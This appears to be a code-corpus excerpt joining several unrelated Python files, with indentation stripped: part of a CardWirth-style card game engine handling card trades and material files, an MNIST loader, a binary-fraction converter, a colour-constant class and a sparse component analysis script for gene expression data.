if not from_event and self.setting.confirm_dumpcard:
if sound:
cw.cwpy.play_sound("page")
s = cw.cwpy.msgs["confirm_dump"] % (header.name)
self.call_modaldlg("YESNO", text=s, parentdialog=parentdialog)
if self.get_yesnoresult() <> wx.ID_OK:
return
target = None
else:
cw.cwpy.call_dlg("ERROR", text=u"「%s」は不正なカード移動先です。" % targettype)
return
# 手札カードダイアログ用のインデックスを取得する
if header.type == "SkillCard":
index = 0
elif header.type == "ItemCard" :
index = 1
elif header.type == "BeastCard":
index = 2
else:
raise ValueError("CARDPOCKET Index in trade method is incorrect.")
# もし移動先がPlayerCardだったら、手札の枚数判定を行う
if targettype == "PLAYERCARD" and target <> owner:
n = len(target.cardpocket[index])
maxn = target.get_cardpocketspace()[index]
# 手札が一杯だったときの処理
if n + 1 > maxn:
if from_event:
# 互換動作: 1.20以前では手札が一杯でも荷物袋に入らない
if not (from_getcontent and cw.cwpy.sdata and cw.cwpy.sct.lessthan("1.20", cw.cwpy.sdata.get_versionhint(frompos=cw.HINT_AREA))):
self.trade("BACKPACK", header=header, from_event=True, sort=sort, party=party,
from_getcontent=from_getcontent)
else:
s = cw.cwpy.msgs["error_hand_be_full"] % target.name
self.call_modaldlg("NOTICE", text=s, parentdialog=parentdialog)
return
# 音を鳴らす
if not from_event:
if targettype == "TRASHBOX":
self.play_sound("dump")
elif targettype == "PAWNSHOP":
self.play_sound("signal")
elif sound:
self.play_sound("page")
# 宿状態の変化を通知
if cw.cwpy.ydata:
cw.cwpy.ydata.changed()
#-----------------------------------------------------------------------
# 移動元からデータを削除
#-----------------------------------------------------------------------
hold = header.hold
fromplayer = isinstance(owner, cw.character.Player)
if cw.cwpy.event.get_selectedcard() and header.ref_original() == cw.cwpy.event.get_selectedcard().ref_original():
cw.cwpy.event.set_selectedcard(cw.cwpy.event.get_inusecard())
# 移動元がCharacterだった場合
if isinstance(owner, cw.character.Character):
assert not move
# 移動元のCardHolderからCardHeaderを削除
owner.cardpocket[index].remove(header)
# 移動元からカードのエレメントを削除
path = "%ss" % header.type
owner.data.remove(path, header.carddata)
# 戦闘中だった場合はデッキからも削除
owner.deck.remove(owner, header)
if target <> owner and clearinusecard and not self.areaid in cw.AREAS_TRADE:
self.clear_inusecardimgfromheader(header)
# 行動予定に入っていればキャンセル
action = owner.actiondata
if action:
targets, aheader, beasts = action
if aheader and aheader.ref_original() == header.ref_original():
aheader = None
targets = None
beasts2 = []
for targets_b, beast in beasts:
if beast.ref_original() <> header.ref_original():
beasts2.append((targets_b, beast))
owner.set_action(targets, aheader, beasts2, True)
# スキルの場合は使用回数を0にする
if header.type == "SkillCard" and owner <> target:
header.maxuselimit = 0
header.uselimit = 0
header.carddata.getfind("Property/UseLimit").text = "0"
# ホールドをFalseに
header.hold = False
if not header.type == "BeastCard":
header.carddata.getfind("Property/Hold").text = "False"
header.set_owner(None)
# 移動元が荷物袋だった場合
elif party and owner == party.backpack:
# 移動元のリストからCardHeaderを削除
owner.remove(header)
if toself:
# 荷物袋内の位置のみ変更
pass
elif header.scenariocard:
# シナリオで入手したカードはそのまま削除してよい
header.contain_xml(load=not targettype in ("PAWNSHOP", "TRASHBOX"))
else:
if is_playingscenario:
if not header.carddata:
e = cw.data.yadoxml2etree(header.fpath)
header.carddata = e.getroot()
header.flags = cw.data.init_flags(header.carddata, True)
header.steps = cw.data.init_steps(header.carddata, True)
header.variants = cw.data.init_variants(header.carddata, True)
# シナリオプレイ中であれば削除フラグを立てて削除を保留
# (F9時に復旧する必要があるため)
if targettype in ("PAWNSHOP", "TRASHBOX"):
# 移動先がゴミ箱・下取りだったら完全削除予約
moved = 2
else:
# どこかに残る場合
moved = 1
etree = cw.data.xml2etree(element=header.carddata)
etree.edit("Property", str(moved), "moved")
etree.write_xml()
header.moved = moved
header2 = cw.header.CardHeader(carddata=header.carddata)
header2.fpath = header.fpath
party.backpack_moved.append(header2)
header.fpath = ""
elif move:
# ファイルの移動のみ
self.ydata.deletedpaths.add(header.fpath, header.scenariocard)
else:
# 宿にいる場合はそのまま削除する
header.contain_xml()
# 移動元がカード置場だった場合
elif owner == self.ydata.storehouse:
# 移動元のリストからCardHeaderを削除
owner.remove(header)
if toself:
# カード置場内の位置のみ変更
pass
elif move:
# ファイルの移動のみ
self.ydata.deletedpaths.add(header.fpath, header.scenariocard)
else:
header.contain_xml()
# 移動元が存在しない場合(get or loseコンテンツから呼んだ場合)
else:
assert not move
header.contain_xml()
if header == self.selectedheader:
self.clear_inusecardimg()
#-----------------------------------------------------------------------
# ファイル削除
#-----------------------------------------------------------------------
# 移動先がゴミ箱・下取りだったら
if targettype in ("PAWNSHOP", "TRASHBOX"):
assert not move
# 付帯以外の召喚獣カードの場合
if header.type == "BeastCard" and not header.attachment and\
isinstance(owner, cw.character.Character):
if update_image:
owner.update_image()
# シナリオで取得したカードじゃない場合、XMLの削除
elif not header.scenariocard and header.moved == 0:
self.remove_xml(header)
if fromplayer and is_playingscenario:
# PCによってシナリオへ持ち込まれたカードを破棄する際は
# デバッグログに出すために記録しておく
# (荷物袋からの破棄・移動はbackpack_movedに入るため不要)
dcpath = cw.util.join_paths(cw.tempdir, u"ScenarioLog/Party/Deleted" + header.type)
if not os.path.isdir(dcpath):
os.makedirs(dcpath)
dfpath = cw.util.join_paths(dcpath, cw.util.repl_dischar(header.name) + ".xml")
dfpath = cw.util.dupcheck_plus(dfpath, yado=False)
etree = cw.data.xml2etree(element=header.carddata)
etree.write(dfpath)
elif not header.scenariocard and header.moved == 1:
# 荷物袋からPCへ移動してそこから除去した場合
assert not header.carddata is None
header.contain_xml()
etree = cw.data.xml2etree(element=header.carddata)
etree.edit("Property", "2", "moved")
header.moved = 2
header.set_owner("BACKPACK")
header.write(party=party)
header.set_owner(None)
self.ydata.party.backpack_moved.append(header)
#-----------------------------------------------------------------------
# 移動先にデータを追加する
#-----------------------------------------------------------------------
# 移動先がPlayerCardだった場合
if targettype == "PLAYERCARD":
assert not move
# cardpocketにCardHeaderを追加
header.set_owner(target)
header.set_hold(hold)
# 使用回数を設定
header.get_uselimit()
if from_event and header.type == "SkillCard":
header.uselimit = header.maxuselimit
# カードのエレメントを追加
path = "%ss" % header.type
if toindex == -1:
target.cardpocket[index].append(header)
target.data.append(path, header.carddata)
else:
target.cardpocket[index].insert(toindex, header)
target.data.find(path).insert(toindex, header.carddata)
# ~1.1まではDBにwsnversion列が無いため、
# header.wsnversionがNoneの場合がある
header.wsnversion = header.carddata.getattr(".", "dataVersion", "")
# 戦闘中の場合、Deckの手札・山札に追加
if cw.cwpy.is_battlestatus():
target.deck.add(target, header, is_replace=toindex != -1)
# 移動先が荷物袋だった場合
elif targettype == "BACKPACK":
# 移動先のリストにCardHeaderを追加
if toindex == -1:
header.order = cw.util.new_order(target, mode=1)
target.insert(0, header)
else:
if insertorder == -1:
header.order = cw.util.new_order(target, mode=1)
else:
header.order = insertorder
target.insert(toindex, header)
header.set_owner("BACKPACK")
if sort:
party.sort_backpack()
# 移動先がカード置場だった場合
elif targettype == "STOREHOUSE":
# 移動先のリストにCardHeaderを追加
if toindex == -1:
header.order = cw.util.new_order(target, mode=1)
target.insert(0, header)
else:
if insertorder == -1:
header.order = cw.util.new_order(target, mode=1)
else:
header.order = insertorder
target.insert(toindex, header)
header.set_owner("STOREHOUSE")
if sort:
self.ydata.sort_storehouse()
# 下取りに出した場合
elif targettype == "PAWNSHOP":
assert not move
# パーティの所持金または金庫に下取金を追加
if party:
self.exec_func(party.set_money, price, blink=True)
else:
self.exec_func(self.ydata.set_money, price, blink=True)
self.exec_func(self.draw)
if targettype in ("BACKPACK", "STOREHOUSE") and not toself:
# 移動先が荷物袋かカード置場だったら
if move:
header.write(party, move=True)
header.carddata = None
else:
header.fpath = ""
etree = cw.data.xml2etree(element=header.carddata)
if not from_getcontent:
# 削除フラグを除去
if etree.getint("Property", "moved", 0) <> 0:
etree.remove("Property", attrname="moved")
header.moved = 0
header.write(party, from_getcontent=from_getcontent)
header.carddata = None
if header == self.selectedheader:
self.selectedheader = None
if not sort and targettype == "BACKPACK" and cw.cwpy.ydata.party:
cw.cwpy.ydata.party.sorted_backpack_by_order = False
# カード選択ダイアログを再び開く(イベントから呼ばれたのでなかったら)
if not from_event and call_predlg:
self.call_predlg()
def remove_xml(self, target):
"""xmlファイルを削除する。
target: AdventurerHeader, PlayerCard, CardHeader, XMLFilePathを想定。
"""
if isinstance(target, cw.character.Player):
self.ydata.deletedpaths.add(target.data.fpath)
self.remove_materials(target.data.find("Property"))
elif isinstance(target, cw.header.AdventurerHeader):
self.ydata.deletedpaths.add(target.fpath)
data = cw.data.yadoxml2element(target.fpath, "Property")
self.remove_materials(data)
elif isinstance(target, cw.header.CardHeader):
if target.fpath:
self.ydata.deletedpaths.add(target.fpath)
if target.carddata is not None:
data = target.carddata
else:
data = cw.data.yadoxml2element(target.fpath)
self.remove_materials(data)
elif isinstance(target, cw.data.Party):
self.ydata.deletedpaths.add(target.data.fpath)
self.remove_materials(target.data)
elif isinstance(target, (str, unicode)):
if target.endswith(".xml"):
self.ydata.deletedpaths.add(target)
data = cw.data.yadoxml2element(target)
self.remove_materials(data)
def remove_materials(self, data):
"""XMLElementに記されている
素材ファイルを削除予定リストに追加する。
"""
e = data.find("Property/Materials")
if not e is None:
path = cw.util.join_paths(self.yadodir, e.text)
temppath = cw.util.join_paths(self.tempdir, e.text)
if os.path.isdir(path):
self.ydata.deletedpaths.add(path)
if os.path.isdir(temppath):
self.ydata.deletedpaths.add(temppath)
else:
# Property/Materialsが無かった頃の互換動作
for e in data.iter():
if e.tag == "ImagePath" and e.text and not cw.binary.image.path_is_code(e.text):
path = cw.util.join_paths(self.yadodir, e.text)
temppath = cw.util.join_paths(self.tempdir, e.text)
if os.path.isfile(path):
self.ydata.deletedpaths.add(path)
if os.path.isfile(temppath):
self.ydata.deletedpaths.add(temppath)
def copy_materials(self, data, dstdir, from_scenario=True, scedir="",
yadodir=None, toyado=None, adventurer=False,
imgpaths=None, importimage=False, can_loaded_scaledimage=False):
"""
from_scenario: Trueの場合は開いているシナリオから、
Falseの場合は開いている宿からコピーする
XMLElementに記されている
素材ファイルをdstdirにコピーする。
"""
orig_scedir = scedir
if isinstance(data, cw.data.CWPyElementTree):
data = data.getroot()
if imgpaths is None:
imgpaths = {}
r_specialfont = re.compile("#.") # 特殊文字(#)
if data.tag == "Property":
prop = data
else:
prop = data.find("Property")
if toyado:
yadodir2 = toyado
dstdir2 = dstdir.replace(toyado + "/", "", 1)
else:
yadodir2 = self.yadodir
dstdir2 = dstdir.replace(yadodir2 + "/", "", 1)
if adventurer:
mdir = ""
emp = None
else:
emp = prop.find("Materials")
if emp is None:
mdir = ""
e = cw.data.make_element("Materials", dstdir2)
prop.append(e)
else:
if not scedir:
scedir = cw.util.join_yadodir(emp.text)
mdir = emp.text
if mdir in imgpaths:
emp.text = imgpaths[mdir]
else:
emp.text = dstdir2
imgpaths[mdir] = dstdir2
if yadodir and mdir:
from_scenario = True
scedir = cw.util.join_paths(yadodir, mdir)
if not scedir and from_scenario:
scedir = self.sdata.scedir
for e in data.iter():
e.content = None # イベントコンテントのキャッシュは削除しておく
if e.tag == "ImagePath" and importimage:
# ImagePathはcarddata無しでの表示に必要となるので取り込んでおく
if e.text and not cw.binary.image.path_is_code(e.text):
path = cw.util.join_paths(orig_scedir, e.text)
if os.path.isfile(path):
with open(path, "rb") as f:
imagedata = f.read()
f.close()
e.text = cw.binary.image.data_to_code(imagedata)
elif e.tag in ("ImagePath", "SoundPath", "SoundPath2"):
path = e.text
if path:
if yadodir and mdir:
path = cw.util.relpath(path, mdir)
def set_material(text):
e.text = text
self._copy_material(data, dstdir, from_scenario, scedir, imgpaths, e, path, set_material, yadodir, toyado,
can_loaded_scaledimage=can_loaded_scaledimage)
elif e.tag in ("Play", "Talk"):
path = e.getattr(".", "path", "")
if path:
if yadodir and mdir:
path = cw.util.relpath(path, mdir)
def set_material(text):
e.attrib["path"] = text
self._copy_material(data, dstdir, from_scenario, scedir, imgpaths, e, path, set_material, yadodir, toyado,
can_loaded_scaledimage=can_loaded_scaledimage)
elif e.tag == "Text" and e.text:
for spchar in r_specialfont.findall(e.text):
c = "font_" + spchar[1:]
def set_material(text):
pass
for ext in cw.EXTS_IMG:
self._copy_material(data, dstdir, from_scenario, scedir, imgpaths, e, c + ext, set_material, yadodir, toyado,
can_loaded_scaledimage=can_loaded_scaledimage)
elif e.tag == "Effect":
path = e.getattr(".", "sound", "")
if path:
if yadodir and mdir:
path = cw.util.relpath(path, mdir)
def set_material(text):
e.attrib["sound"] = text
self._copy_material(data, dstdir, from_scenario, scedir, imgpaths, e, path, set_material, yadodir, toyado,
can_loaded_scaledimage=can_loaded_scaledimage)
elif not e is data and e.tag == "BeastCard" and from_scenario:
self.sdata.copy_carddata(e, dstdir, from_scenario, scedir, imgpaths)
def _copy_material(self, data, dstdir, from_scenario, scedir, imgpaths, e, materialpath, set_material, yadodir, toyado,
can_loaded_scaledimage):
pisc = not e is None and e.tag == "ImagePath" and cw.binary.image.path_is_code(materialpath)
if pisc:
imgpath = materialpath
else:
if from_scenario:
if not scedir:
scedir = self.sdata.scedir
imgpath = cw.util.join_paths(cw.tempdir, u"ScenarioLog/TempFile", materialpath)
if not os.path.isfile(imgpath):
imgpath = cw.util.join_paths(scedir, materialpath)
elif yadodir:
imgpath = cw.util.join_paths(yadodir, materialpath)
else:
imgpath = cw.util.join_yadodir(materialpath)
if not yadodir:
imgpath = cw.util.get_materialpathfromskin(imgpath, cw.M_IMG)
# 吉里吉里形式音声ループ情報
sli = imgpath + u".sli"
if not os.path.isfile(sli):
sli = None
if not (pisc or os.path.isfile(imgpath)):
return
# Jpy1から参照しているイメージを再帰的にコピーする
if from_scenario and cw.util.splitext(imgpath)[1].lower() == ".jpy1":
try:
config = cw.effectbooster.EffectBoosterConfig(imgpath, "init")
for section in config.sections():
jpy1innnerfile = config.get(section, "filename", "")
if not jpy1innnerfile:
continue
dirtype = config.get_int(section, "dirtype", 1)
innerfpath = cw.effectbooster.get_filepath_s(config.path, imgpath, jpy1innnerfile, dirtype)
if not innerfpath.startswith(scedir + "/"):
continue
innerfpath = innerfpath.replace(scedir + "/", "", 1)
def func(text):
pass
self._copy_material(data, dstdir, from_scenario, scedir, imgpaths, None, innerfpath, func, yadodir, toyado,
can_loaded_scaledimage=can_loaded_scaledimage)
except Exception:
cw.util.print_ex()
# 重複チェック。既に処理しているimgpathかどうか
keypath = imgpath
if yadodir:
keypath = cw.util.relpath(keypath, yadodir)
if not pisc and keypath in imgpaths:
# ElementTree編集
set_material(imgpaths[keypath])
else:
# 対象画像のコピー先を作成
if pisc:
idata = cw.binary.image.code_to_data(imgpath)
ext = cw.util.get_imageext(idata)
dname = cw.util.repl_dischar(data.gettext("Property/Name", "simage")) + ext
elif from_scenario:
dname = materialpath
else:
dname = os.path.basename(imgpath)
imgdst = cw.util.join_paths(dstdir, dname)
imgdst = cw.util.dupcheck_plus(imgdst, yado=not yadodir)
if not yadodir and imgdst.startswith("Yado"):
imgdst = imgdst.replace(self.yadodir, self.tempdir, 1)
# 対象画像コピー
if not os.path.isdir(os.path.dirname(imgdst)):
os.makedirs(os.path.dirname(imgdst))
if pisc:
imgdst = cw.util.dupcheck_plus(imgdst, False)
with open(imgdst, "wb") as f:
f.write(idata)
f.flush()
f.close()
else:
cw.util.copy_scaledimagepaths(imgpath, imgdst, can_loaded_scaledimage)
if sli:
shutil.copy2(sli, imgdst + u".sli")
# ElementTree編集
if yadodir:
materialpath = imgdst.replace(toyado + "/", "", 1)
else:
materialpath = imgdst.replace(self.tempdir + "/", "", 1)
set_material(materialpath)
if not pisc:
# 重複して処理しないよう辞書に登録
imgpaths[keypath] = materialpath
#-------------------------------------------------------------------------------
# 状態取得用メソッド
#-------------------------------------------------------------------------------
def is_running(self):
"""CWPyスレッドがアクティブかどうかbool値を返す。
アクティブでない場合は、CWPyRunningErrorを投げて、
CWPyスレッドを終了させる。この挙動は正常。
"""
if not self._running:
if threading.currentThread() == self:
raise CWPyRunningError()
return self._running
def is_runningstatus(self):
return self._running
def is_playingscenario(self):
return bool(isinstance(self.sdata, cw.data.ScenarioData)\
and self.sdata.is_playing and self.ydata and self.ydata.party)
def is_runningevent(self):
return self.event.get_event() or\
self.event.get_effectevent() or\
pygame.event.peek(USEREVENT) or\
(self.is_battlestatus() and not (self.battle and self.battle.is_ready())) or\
self.is_decompressing
def is_statusbarmask(self):
return cw.cwpy.setting.statusbarmask and cw.cwpy.is_playingscenario() and \
not self.is_processing and self.ydata and self.ydata.party and not self.ydata.party.is_loading()
def is_showingdlg(self):
return 0 < self._showingdlg
def is_expanded(self):
return self.setting.is_expanded
def is_curtained(self):
return self._curtained
def is_dealing(self):
return self._dealing
def is_autospread(self):
return self._autospread
def is_gameover(self):
if self.is_playingscenario() and not self._forcegameover:
self._gameover = True
pcards = self.get_pcards("unreversed")
for pcard in pcards:
if pcard.is_alive():
self._gameover = False
break
self._gameover |= not bool(pcards)
return self._gameover
def is_forcegameover(self):
return self._forcegameover
def is_showingmessage(self):
return bool(self.get_messagewindow())
def is_showingdebugger(self):
return bool(self.frame.debugger)
def is_showingbacklog(self):
return self._is_showingbacklog
def is_debugmode(self):
return self.debug
def is_battlestatus(self):
"""現在のCWPyのステータスが、シナリオバトル中かどうか返す。
if cw.cwpy.battle:と使い分ける。
"""
return cw.cwpy.is_playingscenario() and self.status == "ScenarioBattle"
#-------------------------------------------------------------------------------
# 各種スプライト取得用メソッド
#-------------------------------------------------------------------------------
def get_inusecardimg(self):
"""InuseCardImageインスタンスを返す(使用カード)。"""
if self.inusecards:
return self.inusecards[0]
else:
return None
def get_guardcardimg(self):
"""InuseCardImageインスタンスを返す(防御・回避ボーナスカード)。"""
if self.guardcards:
return self.guardcards[0]
else:
return None
def get_messagewindow(self):
"""MessageWindow or SelectWindowインスタンスを返す。"""
sprites = self.cardgrp.get_sprites_from_layer(cw.LAYER_MESSAGE)
if sprites:
return sprites[0]
sprites = self.cardgrp.get_sprites_from_layer(cw.LAYER_SPMESSAGE)
if sprites:
return sprites[0]
return None
def get_mcards(self, mode="", flag=""):
"""MenuCardインスタンスのリストを返す。
mode: "visible" or "invisible" or "visiblemenucards" or "flagtrue"
"""
if mode == "visible":
mcards = [m for m in self.get_mcards(flag=flag) if not m.status == "hidden"]
elif mode == "invisible":
mcards = [m for m in self.get_mcards(flag=flag) if m.status == "hidden"]
elif mode == "visiblemenucards":
mcards = [m for m in self.get_mcards(flag=flag) if not m.status == "hidden"
and isinstance(m, cw.sprite.card.MenuCard)]
elif mode == "flagtrue":
mcards = [m for m in self.get_mcards(flag=flag)
if not isinstance(m, cw.character.Friend)
and m.is_flagtrue()]
elif flag:
mcards = self._mcardtable.get(flag, [])
else:
mcards = self.mcards
if self.is_battlestatus() and self.battle and self.battle.is_running():
# 戦闘行動中はNPCを除外(一時的に表示されている可能性があるため)
mcards = [m for m in mcards
if not isinstance(m, (cw.character.Friend, cw.sprite.background.InuseCardImage))]
else:
mcards = [m for m in mcards
if not isinstance(m, cw.sprite.background.InuseCardImage)]
return mcards
def get_ecards(self, mode=""):
"""現在表示中のEnemyCardインスタンスのリストを返す。
mode: "unreversed" or "active"
"""
if not self.is_battlestatus():
return []
ecards = self.get_mcards("visible")
if mode == "unreversed":
ecards = [ecard for ecard in ecards if not ecard.is_reversed()]
elif mode == "active":
ecards = [ecard for ecard in ecards if ecard.is_active()]
ecards = filter(lambda ecard: isinstance(ecard, cw.character.Enemy), ecards)
return ecards
def get_pcards(self, mode=""):
"""PlayerCardインスタンスのリストを返す。
mode: "unreversed" or "active"
"""
if mode == "unreversed":
pcards = [pcard for pcard in self.get_pcards() if not pcard.is_reversed()]
elif mode == "active":
pcards = [pcard for pcard in self.get_pcards() if pcard.is_active()]
else:
pcards = self.pcards
pcards = [m for m in pcards
if not isinstance(m, (cw.character.Friend, cw.sprite.background.InuseCardImage))]
return pcards
def get_fcards(self, mode=""):
"""FriendCardインスタンスのリストを返す。
シナリオプレイ中以外は空のリストを返す。
mode: "unreversed" or "active"
"""
if not self.is_playingscenario():
return []
fcards = self.sdata.friendcards
if mode == "unreversed":
fcards = [fcard for fcard in fcards if not fcard.is_reversed()]
elif mode == "active":
fcards = [fcard for fcard in fcards if fcard.is_active()]
return fcards
_mutex_postevent = threading.Lock()
@synclock(_mutex_postevent)
def post_pygameevent(event):
"""pygameイベントをキューへ投入する。
投入に失敗した場合は一度だけ入力イベントを
クリアしてからの再投入を試みる。
"""
try:
pygame.event.post(event)
except:
# 入力イベントが輻輳している場合はクリアする
cw.cwpy.clear_inputevents()
pygame.event.post(event)
class ShowMenuCards(object):
def __init__(self, cwpy):
self.cwpy = cwpy
self.rect = pygame.Rect(cw.s((0, 0)), cw.s(cw.SIZE_AREA))
def lclick_event(self):
cw.cwpy.wait_showcards = False
def rclick_event(self):
cw.cwpy.wait_showcards = False
def main():
pass
if __name__ == "__main__":
main()
|
python
|
from lib.config.config import cfg, pth
import torch
import torchvision
from torchvision import transforms, datasets
import os
import sys
sys.path.append('..')
sys.path.append('../..')
dataset_save_pth = pth.DATA_DIR
# 画像ファイルを読み込むための準備(channels x H x W)
transform = transforms.Compose([
transforms.ToTensor()
])
# データセットの取得
train_val = datasets.MNIST(
root=dataset_save_pth,
train=True,
download=True,
transform=transform
)
test = datasets.MNIST(
root=dataset_save_pth,
train=False,
download=True,
transform=transform
)
# train : val = 80% : 20%
n_train = int(len(train_val) * 0.8)
n_val = len(train_val) - n_train
# データをランダムに分割
train, val = torch.utils.data.random_split(train_val, [n_train, n_val])
|
python
|
from decimal import Decimal
while True:
a = input('Number: ').replace('0.', '')
b = Decimal('0')
for i, c in zip(a, range(-1, -1 - len(a), -1)):
b += Decimal(str(i)) * Decimal('2') ** Decimal(str(c))
print(b)
|
python
|
class Color:
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
LIGHT_GRAY = (200, 200, 200)
GRAY = (127, 127, 127)
DARK_GRAY = (50, 50, 50)
RED = (0,0, 255)
GREEN = (0, 255, 0)
BLUE = (255, 0, 0)
YELLOW = (0, 255, 255)
CYAN = (255, 255, 0)
MAGENTA = (255, 0, 255)
|
python
|
#%%
import os
import pickle
import time
from pathlib import Path
import colorcet as cc
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from sklearn.decomposition import PCA
from sklearn.feature_selection import VarianceThreshold
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from graspologic.plot import pairplot
from sparse_decomposition import SparseComponentAnalysis
from sparse_decomposition.utils import calculate_explained_variance_ratio
from sparse_new_basis.data import load_scRNAseq
from sparse_new_basis.plot import savefig, set_theme
set_theme()
fig_dir = Path("sparse_new_basis/results/gene_sca_examine_components_1.0")
def stashfig(name, *args, **kwargs):
savefig(fig_dir, name, *args, **kwargs)
#%%
output_dir = Path("sparse_new_basis/experiments/genes/outputs")
var_thresh = 0.01
train_size = 2 ** 14
n_components = 20
max_iter = 20
with_mean = True
with_std = True
seed = 8888
global_params = (
f"var_thresh={var_thresh}-train_size={train_size}-n_components={n_components}"
f"-max_iter={max_iter}-with_std={with_std}-seed={seed}"
)
output_dir = output_dir / global_params
if not os.path.isdir(output_dir):
print(f"{output_dir} is not a directory... creating.")
os.mkdir(output_dir)
os.mkdir(output_dir / "data")
os.mkdir(output_dir / "models")
#%%
sequencing_df, annotation_df = load_scRNAseq(fillna=True)
#%% throw out some genes with low variance
X = sequencing_df.values.copy()
var_thresh = VarianceThreshold(threshold=var_thresh)
X = var_thresh.fit_transform(X)
gene_index = sequencing_df.columns
original_n_genes = len(gene_index)
gene_index = gene_index[var_thresh.get_support()]
sequencing_df = sequencing_df[gene_index]
new_n_genes = len(gene_index)
print(
f"Number of genes removed: {original_n_genes - new_n_genes} "
f"out of {original_n_genes}"
)
#%%
np.random.seed(seed)
neuron_index = sequencing_df.index
y = sequencing_df.index.get_level_values(level="Neuron_type").values
# stratify=y will try to set the distribution of class labels the same for train/test
X_train, X_test, index_train, index_test = train_test_split(
X, neuron_index, stratify=y, train_size=train_size
)
with open(output_dir / Path("data") / "sequencing_df.pkl", "wb") as f:
pickle.dump(sequencing_df, f)
with open(output_dir / Path("data") / "index_train.pkl", "wb") as f:
pickle.dump(index_train, f)
with open(output_dir / Path("data") / "index_test.pkl", "wb") as f:
pickle.dump(index_test, f)
#%% center and scale training data
currtime = time.time()
scaler = StandardScaler(with_mean=with_mean, with_std=with_std, copy=False)
X_train = scaler.fit_transform(X_train)
print(f"{time.time() - currtime:.3f} elapsed to scale and center data.")
with open(output_dir / Path("models") / "scaler.pkl", "wb") as f:
pickle.dump(scaler, f)
#%%
np.random.seed(seed)
currtime = time.time()
pca = PCA(n_components=n_components)
X_pca = pca.fit_transform(X_train)
print(f"{time.time() - currtime:.3f} elapsed to fit PCA model.")
#%%
np.random.seed(seed)
gammas = [
# np.inf
n_components,
# 100,
# 250,
# 500,
# int(np.sqrt(X_train.shape[1]) * n_components),
# np.inf,
]
gammas = [float(g) for g in gammas]
models_by_gamma = {}
Xs_by_gamma = {}
for i, gamma in enumerate(gammas):
print(f"Gamma = {gamma}...")
if gamma == np.inf:
_max_iter = 0
else:
_max_iter = max_iter
currtime = time.time()
sca = SparseComponentAnalysis(
n_components=n_components, max_iter=_max_iter, gamma=gamma
)
X_sca = sca.fit_transform(X_train)
print(f"{time.time() - currtime:.3f} elapsed.")
models_by_gamma[gamma] = sca
Xs_by_gamma[gamma] = X_sca
model_name = f"sca_gamma={gamma}"
# with open(output_dir / Path("models") / f"{model_name}.pkl", "wb") as f:
# pickle.dump(sca, f)
# print()
#%%
# gamma = 20.0
# with open(output_dir / Path("models") / f"sca_gamma={gamma}.pkl", "rb") as f:
# sca = pickle.load(f)
#%%
rows = []
for gamma, model in models_by_gamma.items():
explained_variance_ratio = model.explained_variance_ratio_
for k, ev in enumerate(explained_variance_ratio):
n_nonzero = np.count_nonzero(model.components_[: k + 1])
rows.append(
{
"gamma": gamma,
"explained_variance": ev,
"n_components": k + 1,
"n_nonzero": n_nonzero,
}
)
scree_df = pd.DataFrame(rows)
#%% palette
# palette = dict(zip(gammas, sns.color_palette("deep", 10)))
# blue_shades = sns.color_palette("Blues", n_colors=len(gammas))[1:]
# palette = dict(zip(gammas[:-1], blue_shades))
# red_shades = sns.color_palette("Reds", n_colors=len(gammas))[1:]
# palette[np.inf] = red_shades[-1]
#%%
# fig, ax = plt.subplots(1, 1, figsize=(8, 4))
# sns.lineplot(
# data=scree_df,
# x="n_components",
# y="explained_variance",
# hue="gamma",
# ax=ax,
# marker="o",
# palette=palette,
# )
# ax.get_legend().remove()
# ax.legend(bbox_to_anchor=(1, 1), loc="upper left", title="Gamma")
# # ax.legend().set_title("Gamma")
# ax.set(ylabel="Cumulative explained variance", xlabel="# of PCs")
# ax.yaxis.set_major_locator(plt.MaxNLocator(3))
# ax.xaxis.set_major_locator(plt.IndexLocator(base=5, offset=-1))
# stashfig("screeplot")
#%%
# fig, ax = plt.subplots(1, 1, figsize=(8, 4))
# sns.lineplot(
# data=scree_df,
# x="n_nonzero",
# y="explained_variance",
# hue="gamma",
# ax=ax,
# marker="o",
# palette=palette,
# )
# ax.get_legend().remove()
# ax.legend(bbox_to_anchor=(1, 1), loc="upper left", title="Gamma")
# # ax.legend().set_title("Gamma")
# ax.set(ylabel="Cumulative explained variance", xlabel="# nonzero elements")
# plt.xscale("log")
# ax.yaxis.set_major_locator(plt.MaxNLocator(3))
# # ax.xaxis.set_major_locator(plt.IndexLocator(base=5, offset=-1))
# stashfig("screeplot-by-params")
#%%
neuron_types = index_train.get_level_values("Neuron_type").values
neuron_type_palette = dict(zip(np.unique(neuron_types), cc.glasbey_light))
n_show = 5
# def make_plot_df(X, labels=None):
# columns = [f"Dimension {i+1}" for i in range(X.shape[1])]
# plot_df = pd.DataFrame(data=X, columns=columns)
# if labels is not None:
# plot_df["labels"] = labels
# return plot_df
# pg = sns.PairGrid(
# data=make_plot_df(X_pca[:, :n_show], neuron_types),
# hue="labels",
# palette=neuron_type_palette,
# corner=True,
# )
# pg.map_lower(sns.scatterplot, alpha=0.7, linewidth=0, s=10)
# pg.set(xticks=[], yticks=[])
# pg.fig.suptitle("PCA")
# axes = pg.axes
# fig = pg.fig
# gs = fig._gridspecs[0]
# for i in range(len(axes)):
# axes[i, i].remove()
# axes[i, i] = None
# ax = fig.add_subplot(gs[i, i])
# axes[i, i] = ax
# ax.axis("off")
# p_nonzero = np.count_nonzero(X_pca[:, i]) / len(X_pca)
# text = f"{p_nonzero:.2f}"
# if i == 0:
# text = "Proportion\nnonzero:\n" + text
# ax.text(0.5, 0.5, text, ha="center", va="center")
# stashfig("pairplot-pca-celegans-genes")
#%%
# X_sca = Xs_by_gamma[20]
# pg = sns.PairGrid(
# data=make_plot_df(X_sca[:, :n_show], neuron_types),
# hue="labels",
# palette=neuron_type_palette,
# corner=True,
# )
# # hide_indices = np.tril_indices_from(axes, 1)
# # for i, j in zip(*hide_indices):
# # axes[i, j].remove()
# # axes[i, j] = None
# pg.map_lower(sns.scatterplot, alpha=0.7, linewidth=0, s=10)
# pg.set(xticks=[], yticks=[])
# pg.fig.suptitle("SCA")
# axes = pg.axes
# fig = pg.fig
# gs = fig._gridspecs[0]
# for i in range(len(axes)):
# axes[i, i].remove()
# axes[i, i] = None
# ax = fig.add_subplot(gs[i, i])
# axes[i, i] = ax
# ax.axis("off")
# p_nonzero = np.count_nonzero(X_sca[:, i]) / len(X_sca)
# text = f"{p_nonzero:.2f}"
# if i == 0:
# text = "Proportion\nnonzero:\n" + text
# ax.text(0.5, 0.5, text, ha="center", va="center")
